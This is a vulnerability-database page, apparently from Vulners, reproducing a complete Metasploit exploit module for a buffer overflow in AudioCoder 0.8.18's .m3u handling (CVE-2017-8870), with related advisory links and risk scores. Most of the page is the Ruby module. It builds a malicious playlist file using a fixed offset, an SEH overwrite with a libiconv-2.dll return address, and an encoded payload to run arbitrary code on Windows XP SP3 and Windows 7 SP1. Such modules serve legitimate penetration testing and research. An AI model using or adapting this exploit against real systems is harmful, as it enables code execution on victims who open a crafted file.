Lucene search
K

AudioCoder .M3U Buffer Overflow

🗓️ 03 May 2013 03:00:43Reported by metacom, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 21 Views

AudioCoder .M3U Buffer Overflow allows arbitrary code execution by adding a malicious .m3u file in AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1

Related
Code
ReporterTitlePublishedViews
Family
0day.today
AudioCoder 0.8.46 - Local Buffer Overflow (SEH) Exploit
27 Jul 201700:00
zdt
Circl
CVE-2017-8870
26 Jul 201700:00
circl
CNVD
AudioCoder Buffer Overflow Vulnerability
28 Jul 201700:00
cnvd
CVE
CVE-2017-8870
27 Jul 201718:00
cve
Cvelist
CVE-2017-8870
27 Jul 201718:00
cvelist
Exploit DB
AudioCoder 0.8.46 - Local Buffer Overflow (SEH)
26 Jul 201700:00
exploitdb
exploitpack
AudioCoder 0.8.46 - Local Buffer Overflow (SEH)
26 Jul 201700:00
exploitpack
NVD
CVE-2017-8870
27 Jul 201718:29
nvd
OSV
CVE-2017-8870
27 Jul 201718:29
osv
Packet Storm
AudioCoder 0.8.46 Local Buffer Overflow
27 Jul 201700:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AudioCoder .M3U Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in AudioCoder 0.8.18. The vulnerability
        occurs when adding an .m3u, allowing arbitrary code execution with the privileges
        of the user running AudioCoder. This module has been tested successfully on
        AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2017-8870' ],
          [ 'OSVDB', '92939' ],
          [ 'EDB', '25141' ]
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'           => 6596,
          'BadChars'        => "\x00\x5c\x40\x0d\x0a",
          'DisableNops'     => true,
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [ 'AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'     => 0x66011b56, # ppr from libiconv-2.dll
              'Offset'  => 765
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2013-05-01',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
      ])

  end

  def exploit
    buffer = "http://"
    buffer << rand_text(target['Offset'])
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded

    file_create(buffer)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.9Low risk
Vulners AI Score0.9
CVSS 26.8
CVSS 37.8
EPSS0.13674
21